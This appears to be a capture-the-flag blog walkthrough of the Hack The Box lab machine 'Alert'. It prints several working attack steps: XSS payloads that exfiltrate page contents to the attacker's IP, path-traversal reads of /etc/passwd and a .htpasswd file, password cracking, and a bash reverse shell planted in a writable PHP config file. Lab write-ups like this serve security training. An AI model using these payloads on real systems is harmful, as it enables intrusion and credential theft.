Hackthebox: Alert

Foued SAIDI Lv4
  2025-03-21 18:18:26 2025-03-21 18:18:26 Created   2025-03-22 14:46:47 2025-03-22 14:46:47 Updated    

Overview

Alert is an easy-difficulty machine from Hack The Box dealing initially with an XSS attack that we’ll leverage to exfiltrate data little by little from the system to discover a hidden endpoint vulnerable to Local File Inclusion (LFI) to get ssh credentials. We’ll finally exploit some misconfigured permissions that’ll allow us to tamper with a PHP app’s file inclusions to land a root shell.

Alert-info-card
Alert-info-card

Reconnaissance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
PS C:\Users\0xkujen> nmap -A -Pn  10.129.207.21
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-22 13:24 W. Central Africa Standard Time
Nmap scan report for alert.htb (10.129.207.21)
Host is up (0.12s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-title: Alert - Markdown Viewer
|_Requested resource was index.php?page=alert
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.47 seconds

We can see that we have our typical ssh 22 port and http 80 port that redirects us to alert.htb which we’ll add to our /etc/hosts.

Web Application - http://alert.htb

Web App
Web App

We can see that this website is a Markdown viewer where we can upload a .md file.

One we upload a file, we can get a reshare link like this one: http://alert.htb/visualizer.php?link_share=67deafd1acc5b5.87004250.md

Now what we’ll be trying to do is upload a .md file containing a js script, to see if we can get a callback to our local machine:

1
2
3
4
5
6
7
8
<script>
fetch("http://alert.htb/index.php")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.16.17/?data=" + encodeURIComponent(data));
  })
  .catch(error => console.error("Error fetching the messages:", error));
</script>

And we do get a callback:

1
2
3
4
PS C:\Users\0xkujen> python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.10.16.17 - - [22/Mar/2025 14:19:54] "GET /?data=%3C!DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%3Chead%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22UTF-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1.0%22%3E%0A%20%20%20%20%3Clink%20rel%3D%22stylesheet%22%20href%3D%22css%2Fstyle.css%22%3E%0A%20%20%20%20%3Ctitle%3EAlert%20-%20Markdown%20Viewer%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody%3E%0A%20%20%20%20%3Cnav%3E%0A%20%20%20%20%20%20%20%20%3Ca%20href%3D%22index.php%3Fpage%3Dalert%22%3EMarkdown%20Viewer%3C%2Fa%3E%0A%20%20%20%20%20%20%20%20%3Ca%20href%3D%22index.php%3Fpage%3Dcontact%22%3EContact%20Us%3C%2Fa%3E%0A%20%20%20%20%20%20%20%20%3Ca%20href%3D%22index.php%3Fpage%3Dabout%22%3EAbout%20Us%3C%2Fa%3E%0A%20%20%20%20%20%20%20%20%3Ca%20href%3D%22index.php%3Fpage%3Ddonate%22%3EDonate%3C%2Fa%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%2Fnav%3E%0A%20%20%20%20%3Cdiv%20class%3D%22container%22%3E%0A%20%20%20%20%20%20%20%20%3Ch1%3EMarkdown%20Viewer%3C%2Fh1%3E%3Cdiv%20class%3D%22form-container%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cform%20action%3D%22visualizer.php%22%20method%3D%22post%22%20enctype%3D%22multipart%2Fform-data%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20type%3D%22file%22%20name%3D%22file%22%20accept%3D%22.md%22%20required%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20type%3D%22submit%22%20value%3D%22View%20Markdown%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%2Fform%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%3Cfooter%3E%0A%20%20%20%20%20%20%20%20%3Cp%20style%3D%22color%3A%20black%3B%22%3E%C2%A9%202024%20Alert.%20All%20rights%20reserved.%3C%2Fp%3E%0A%20%20%20%20%3C%2Ffooter%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A%0A HTTP/1.1" 200 -

Decoding this using https://www.urldecoder.org/ :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/style.css">
    <title>Alert - Markdown Viewer</title>
</head>
<body>
    <nav>
        <a href="index.php?page=alert">Markdown Viewer</a>
        <a href="index.php?page=contact">Contact Us</a>
        <a href="index.php?page=about">About Us</a>
        <a href="index.php?page=donate">Donate</a>
            </nav>
    <div class="container">
        <h1>Markdown Viewer</h1><div class="form-container">
            <form action="visualizer.php" method="post" enctype="multipart/form-data">
                <input type="file" name="file" accept=".md" required>
                <input type="submit" value="View Markdown">
            </form>
          </div>    </div>
    <footer>
        <p style="color: black;">© 2024 Alert. All rights reserved.</p>
    </footer>
</body>
</html>

Now let’s also try to take that reshare link and inject it in the contact form, and we get this callback

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/style.css">
    <title>Alert - Markdown Viewer</title>
</head>
<body>
    <nav>
        <a href="index.php?page=alert">Markdown Viewer</a>
        <a href="index.php?page=contact">Contact Us</a>
        <a href="index.php?page=about">About Us</a>
        <a href="index.php?page=donate">Donate</a>
        <a href="index.php?page=messages">Messages</a>    </nav>
    <div class="container">
        <h1>Markdown Viewer</h1><div class="form-container">
            <form action="visualizer.php" method="post" enctype="multipart/form-data">
                <input type="file" name="file" accept=".md" required>
                <input type="submit" value="View Markdown">
            </form>
          </div>    </div>
    <footer>
        <p style="color: black;">© 2024 Alert. All rights reserved.</p>
    </footer>
</body>
</html>


What’s interesting is that now we have a new page messages, let’s try to view it now:

1
2
3
4
5
6
7
8
<script>
fetch("http://alert.htb/index.php?page=messages)
.then(response => response.text()) // Convert the response to text
.then(data => {
fetch("http://10.10.16.17/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

Now we get something else that’s more interesting:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/style.css">
    <title>Alert - Markdown Viewer</title>
</head>
<body>
    <nav>
        <a href="index.php?page=alert">Markdown Viewer</a>
        <a href="index.php?page=contact">Contact Us</a>
        <a href="index.php?page=about">About Us</a>
        <a href="index.php?page=donate">Donate</a>
        <a href="index.php?page=messages">Messages</a>    </nav>
    <div class="container">
        <h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>
    </div>
    <footer>
        <p style="color: black;">© 2024 Alert. All rights reserved.</p>
    </footer>
</body>
</html>

We get that there is a messages.php page with a file parameter that’s indicating that there might be a Local File Inclusion exploit. Let’s fetch it and test it:

1
2
3
4
5
6
7
8
<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../etc/passwd")
.then(response => response.text()) // Convert the response to text
.then(data => {
fetch("http://10.10.16.17/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

And we do get a hit!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
albert:x:1000:1000:albert:/home/albert:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
david:x:1001:1002:,,,:/home/david:/bin/bash
</pre>

Now let’s read the apache conf file to get more info:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<pre><VirtualHost *:80>
    ServerName alert.htb

    DocumentRoot /var/www/alert.htb

    <Directory /var/www/alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>

    RewriteEngine On
    RewriteCond %{HTTP_HOST} !^alert\.htb$
    RewriteCond %{HTTP_HOST} !^$
    RewriteRule ^/?(.*)$ http://alert.htb/$1 [R=301,L]

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

<VirtualHost *:80>
    ServerName statistics.alert.htb

    DocumentRoot /var/www/statistics.alert.htb

    <Directory /var/www/statistics.alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>

    <Directory /var/www/statistics.alert.htb>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        AuthType Basic
        AuthName "Restricted Area"
        AuthUserFile /var/www/statistics.alert.htb/.htpasswd
        Require valid-user
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

</pre>

We can see a new statistics subdomain with a .htpasswd file for AuthUserFile, let’s read it:

1
2
3
4
5
6
7
8
<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
.then(response => response.text()) // Convert the response to text
.then(data => {
fetch("http://10.10.16.17/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

And we get a username and password hash:

1
2
3
<pre>albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
</pre>

Let’s crack it:

1
2
3
4
5
6
7
8
9
10
11
12
13

┌──(kali㉿kali)-[~]
└─$ john  -w=/usr/share/wordlists/rockyou.txt hash -format=md5crypt-long  
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt-long, crypt(3) $1$ (and variants) [MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?)     
1g 0:00:00:00 DONE (2024-11-23 22:41) 12.50g/s 35200p/s 35200c/s 35200C/s meagan..medicina
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                 
┌──(kali㉿kali)-[~]

Let’s ssh onto the machine and claim our user flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
PS C:\Users\0xkujen> ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-200-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat 22 Mar 2025 12:56:59 PM UTC

  System load:           0.08
  Usage of /:            62.6% of 5.03GB
  Memory usage:          8%
  Swap usage:            0%
  Processes:             238
  Users logged in:       0
  IPv4 address for eth0: 10.129.207.21
  IPv6 address for eth0: dead:beef::250:56ff:fe94:d1e9


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Nov 19 14:19:09 2024 from 10.10.14.23
albert@alert:~$ ls
user.txt
albert@alert:~$ cat user.txt
e26b5e48c55844a0303c88119f554dc5
albert@alert:~$

Privilege Escalation - Broken Permissions in web app

Now listening on the system we can find a suspicious 8080 port that we also check it for any entries in the running processes:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
albert@alert:~$ netstat -anot
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:52850         127.0.0.1:8080          FIN_WAIT2   timewait (32.44/0/0)
tcp        0      0 10.129.207.21:41864     10.10.16.17:4545        ESTABLISHED off (0.00/0/0)
tcp        0    216 10.129.207.21:22        10.10.16.17:60320       ESTABLISHED on (0.20/0/0)
tcp        0      0 127.0.0.1:47874         127.0.0.1:80            TIME_WAIT   timewait (17.13/0/0)
tcp        0      1 10.129.207.21:33080     8.8.8.8:53              SYN_SENT    on (3.25/2/0)
tcp        0      0 127.0.0.1:47878         127.0.0.1:80            TIME_WAIT   timewait (17.13/0/0)
tcp        1      0 127.0.0.1:8080          127.0.0.1:52850         CLOSE_WAIT  off (0.00/0/0)
tcp6       0      0 :::80                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
albert@alert:~$ ps auxf | grep -i 8080
root         985  0.0  0.6 206768 24688 ?        Ss   12:17   0:00 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor
albert      8202  0.0  0.0   6300   720 pts/0    S+   13:42   0:00              \_ grep --color=auto -i 8080

Let’s forward this port to our local machine to check it (the website opened for me previously but this time the latency was crazy). But either way, we have access to the source code on /opt/website-monitor:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
albert@alert:/opt/website-monitor$ ll
total 96
drwxrwxr-x 7 root root        4096 Oct 12 01:07 ./
drwxr-xr-x 4 root root        4096 Oct 12 00:58 ../
drwxrwxr-x 2 root management  4096 Mar 22 13:02 config/
drwxrwxr-x 8 root root        4096 Oct 12 00:58 .git/
drwxrwxr-x 2 root root        4096 Oct 12 00:58 incidents/
-rwxrwxr-x 1 root root        5323 Oct 12 01:00 index.php*
-rwxrwxr-x 1 root root        1068 Oct 12 00:58 LICENSE*
-rwxrwxr-x 1 root root        1452 Oct 12 01:00 monitor.php*
drwxrwxrwx 2 root root        4096 Oct 12 01:07 monitors/
-rwxrwxr-x 1 root root         104 Oct 12 01:07 monitors.json*
-rwxrwxr-x 1 root root       40849 Oct 12 00:58 Parsedown.php*
-rwxrwxr-x 1 root root        1657 Oct 12 00:58 README.md*
-rwxrwxr-x 1 root root        1918 Oct 12 00:58 style.css*
drwxrwxr-x 2 root root        4096 Oct 12 00:58 updates/

And we can see that we have access to the config/ folder since we are members of management group.

Checking the index.php of the app, we see that it is including the conf file from config/ folder:

1
2
albert@alert:/opt/website-monitor$ cat index.php  | grep -i config
include('config/configuration.php');

And we have write permissions on it, so let’s modify its contents to a reverse shell script and just wait and see:

1
2
3
4
albert@alert:/opt/website-monitor/config$ cat configuration.php
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.16.17/4545 0>&1'");
?>

And we get a hit after a couple of seconds:

1
2
3
4
5
6
7
8
PS C:\Users\0xkujen> nc -lvnp 4545
listening on [any] 4545 ...
connect to [10.10.16.17] from (UNKNOWN) [10.129.207.21] 34110
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
a4e91478454e4c8db52823994f635550

That was it for Alert, hope you enjoyed it!

-0xkujen

  • Title: Hackthebox: Alert
  • Author: Foued SAIDI
  • Created at : 2025-03-21 18:18:26
  • Updated at : 2025-03-22 14:46:47
  • Link: https://kujen5.github.io/2025/03/21/Hackthebox-Alert/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
Hackthebox: Alert
  1. Overview
  2. Reconnaissance
  3. Web Application - http://alert.htb
  4. Privilege Escalation - Broken Permissions in web app